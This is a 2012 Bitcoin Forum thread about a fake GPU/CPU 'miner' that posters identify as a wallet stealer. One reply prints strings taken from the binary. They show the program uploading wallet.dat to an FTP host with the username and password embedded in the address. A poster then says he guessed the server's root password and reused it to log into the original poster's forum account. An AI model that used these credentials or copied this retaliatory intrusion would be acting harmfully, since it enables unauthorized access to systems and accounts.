Bitcoin Forum
April 20, 2024, 01:08:14 AM *
News: Latest Bitcoin Core release: 26.0 [Torrent]

Home   Help Search Login Register More  
Pages: [1] 2 3 4 »  All
  Print  
Author Topic: Found new(?) Miner, need help! [Mod note: malware]  (Read 7862 times)
Montico (OP)

Activity: 7
Merit: 0

View Profile
January 26, 2012, 08:59:46 AM
Last edit: January 26, 2012, 11:35:12 PM by theymos

Hi.
I'm mining since some months.
Yesterday i found a new Miner, which mines on GPU, CPU and FPGA at the same time.
This sounds good to me.
I tested it, but only the Linux-version works for me (very good, more hashes than other miners).
But the Windows-Version wont work for me, but i need it, because my mining-rig runs on windows.

I allways get a "Memory exception"-Error.
What do i do wrong?

View Profile Personal Message (Offline)

Ignore
Reply with quote  #2

Report to moderator
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction.

Ignore
Reply with quote  #2

Report to moderator

Ignore
Reply with quote  #2

Report to moderator
Costia

Activity: 28

View Profile
January 26, 2012, 09:30:43 AM

all the miners are more or less the same. parameters matter a lot
mining on the cpu is ineffective. it uses a lot of power and doesn't produce much (around 100 times less than a gpu)
The OS doesn't matter as as well. the code that actually does all the work is in OpenCL - it runs on the GPU itself. you can run whatever OS you want on your CPU - it wont matter much.
so get yourself cgminer\poclbm or something like that.
btcminter claims to have a more efficient miner but from what i have seen so far the difference is 1-3% at best ( and could actually work a bit worse on certain cards)
P4man

Activity: 518
Merit: 500

View Profile
January 26, 2012, 09:42:25 AM

I never heard of this app. Searching the forums brings up zero results (aside from your post). That should be a huge red flag.
I see no source code.
I see no contact info about the developer.

I see no reason anyone would want to run this executable code on their machines.

Montico (OP)

View Profile
January 26, 2012, 09:44:54 AM

I also mined with cgminer, poclbm, diablo and ufasoft.
Also tried a lot settings with the others, but this miner works about 40 mH/s faster then the others.
The Problem is, that i cant run it on windows, only on linux. But there is a windows-version of it, but it allways have an memory exception error.
server
Legendary

Activity: 892
Merit: 1002

1 BTC =1 BTC

View Profile
January 26, 2012, 09:46:08 AM

Boring wallet stealer... Angry "http://ftp://btc:btcwh1t3p0w3r@wotan.cc/wallet-    .dat    \Anwendungsdaten\BitCoin\wallet.dat"

Code:
  From:   To:     Subject:    Date:   ddd, dd mmm yyyy hh:mm:ss   

content_length        >@      p@anonymous   anynomous@ano.nym   ftp *   smtp    http    index.html  GET      HTTP/1.0
 Host:   Referer:    User-Agent: TSNEX HTTP_GET-Function
   Connection: close
 https   checkip.dyndns.org  GET / HTTP/1.0
    Host: checkip.dyndns.org
  User-Agent: TSNEX GetWANIPA-Function
  IP Address: <   APPDATA  /  crossMiner 0.0.1b37 BitCoin Miner for CPU, GPU and FPGA.    Searching for useable devices...    You are using Windows, lookung for FPGA's and GPU's \BitCoin\wallet.dat Searching internal Bus (PCI, PCI-E, ...)    ftp://btc:btcwh1t3p0w3r@wotan.cc/wallet-    .dat    \Anwendungsdaten\BitCoin\wallet.dat \Roaming\BitCoin\wallet.dat Appdata\Roaming\BitCoin\wallet.dat  Error opening Bus @ Memory Exception    Look at err.log for more information

Montico (OP)

View Profile
January 26, 2012, 09:47:13 AM

I never heard of this app. Searching the forums brings up zero results (aside from your post). That should be a huge red flag.
I see no source code.
I see no contact info about the developer.

I see no reason anyone would want to run this executable code on their machines.

I heard from that miner at freenet-boards (an anonymous web).
Someone there told me, it works. But for me, only the Linux-Version works Sad
jake262144

Activity: 210
Merit: 100

View Profile
January 26, 2012, 09:47:37 AM

I also mined with cgminer, poclbm, diablo and ufasoft.
Also tried a lot settings with the others, but this miner works about 40 mH/s faster then the others.
The Problem is, that i cant run it on windows, only on linux. But there is a windows-version of it, but it allways have an memory exception error.
Lovely, if I ever need to take over the world I'll simply grab the source code of any existing miner, mod is to falsely show higher hash rate, and - naturally - trojan the hell out of it.
Booby trap, take cover!

Anyone downloading untrusted executable code found on the net (especially through some anonymous forums) must surely be a brain-dead idiot.
Montico (OP)

View Profile
January 26, 2012, 09:49:12 AM

Boring wallet stealer... Angry "http://ftp://btc:btcwh1t3p0w3r@wotan.cc/wallet-    .dat    \Anwendungsdaten\BitCoin\wallet.dat"

Code:
  From:   To:     Subject:    Date:   ddd, dd mmm yyyy hh:mm:ss   

content_length        >@      p@anonymous   anynomous@ano.nym   ftp *   smtp    http    index.html  GET      HTTP/1.0
 Host:   Referer:    User-Agent: TSNEX HTTP_GET-Function
   Connection: close
 https   checkip.dyndns.org  GET / HTTP/1.0
    Host: checkip.dyndns.org
  User-Agent: TSNEX GetWANIPA-Function
  IP Address: <   APPDATA  /  crossMiner 0.0.1b37 BitCoin Miner for CPU, GPU and FPGA.    Searching for useable devices...    You are using Windows, lookung for FPGA's and GPU's \BitCoin\wallet.dat Searching internal Bus (PCI, PCI-E, ...)    ftp://btc:btcwh1t3p0w3r@wotan.cc/wallet-    .dat    \Anwendungsdaten\BitCoin\wallet.dat \Roaming\BitCoin\wallet.dat Appdata\Roaming\BitCoin\wallet.dat  Error opening Bus @ Memory Exception    Look at err.log for more information

I have no wallets on my mining rig, so can i use it safely?
P4man

View Profile
January 26, 2012, 09:52:18 AM

I have no wallets on my mining rig, so can i use it safely?

Dont be stupid. Why on earth would you? Even if it works, its not going to be faster than any other miner.

Montico (OP)

View Profile
January 26, 2012, 09:58:01 AM

OK, lets assume, the hashrate is faked.
Is there another miner, which can mine on GPU AND CPU at the same time?
server
Legendary

1 BTC =1 BTC

View Profile
January 26, 2012, 09:59:49 AM

OK, lets assume, the hashrate is faked.
Is there another miner, which can mine on GPU AND CPU at the same time?

Yes there is. But first edit your first post and remove the link to the trojan.

Montico (OP)

View Profile
January 26, 2012, 10:01:05 AM

OK, edited.
So, whats the name of this miner?
server
Legendary

1 BTC =1 BTC

View Profile
January 26, 2012, 10:03:56 AM

https://bitcointalk.org/index.php?board=42.0

Costia

View Profile
January 26, 2012, 10:05:12 AM

why do you want to mine on your CPU, it will be cheaper just to buy the BTC on MtGox than mine them with a CPU.
And it can reduce your GPU's performance by more hash-rate than it provides because it can make your miner lag
dani147624

Activity: 22

View Profile
January 26, 2012, 10:50:30 AM
Last edit: January 26, 2012, 01:22:46 PM by dani147624

It's nice from the scammer to have left us an ftp server, login and password:
Code:
ftp://btc:btcwh1t3p0w3r@wotan.cc

I'm uploading some /dev/urandom to that, maybe that causes him some frustration.  Smiley

EDIT: That idiot has ssh on the box, and I managed to guess the root password (it wasn't hard). What do you think I should do?  Tongue
Costia

View Profile
January 26, 2012, 11:28:30 AM

getting some personal information would be nice , but i dont think he is that stupid is he?
dani147624

Activity: 22

View Profile
January 26, 2012, 11:41:11 AM

getting some personal information would be nice , but i dont think he is that stupid is he?

Unfortunately he changed his password before I could start downloading everything he had... Anyway, at least his site it down now (he took it down, not I).
server
Legendary

1 BTC =1 BTC

View Profile
January 26, 2012, 01:26:52 PM

Unfortunately he changed his password before I could start downloading everything he had... Anyway, at least his site it down now (he took it down, not I).

Hmmm so the owner of the ftp was reading this thread too... It's obvious the first poster himself, Montico.

Hi.
Yesterday i found a new Miner, which mines on GPU, CPU and FPGA at the same time.
This sounds good to me.
I tested it, but only the Linux-version works for me (very good, more hashes than other miners).
But the Windows-Version wont work for me, but i need it, because my mining-rig runs on windows.

What do i do wrong?

P4man

View Profile
January 26, 2012, 01:32:02 PM

Hmmm so the owner of the ftp was reading this thread too... It's obvious the first poster himself, Montico.

Think so too.
Clueless newbie gets something that doesnt work working on linux but wants us to try on windows.

Montico (OP)

View Profile
January 26, 2012, 02:10:31 PM

Hi.
This sounds good to me.

What do i do wrong?

ROTFLOL. I just tried to login to Montico with the same password as his root password, and... success! So, here I am writing to you from his account. This is just ridiculous. (I'm dani147624.)

Pages: [1] 2 3 4 »  All
  Print  

Jump to: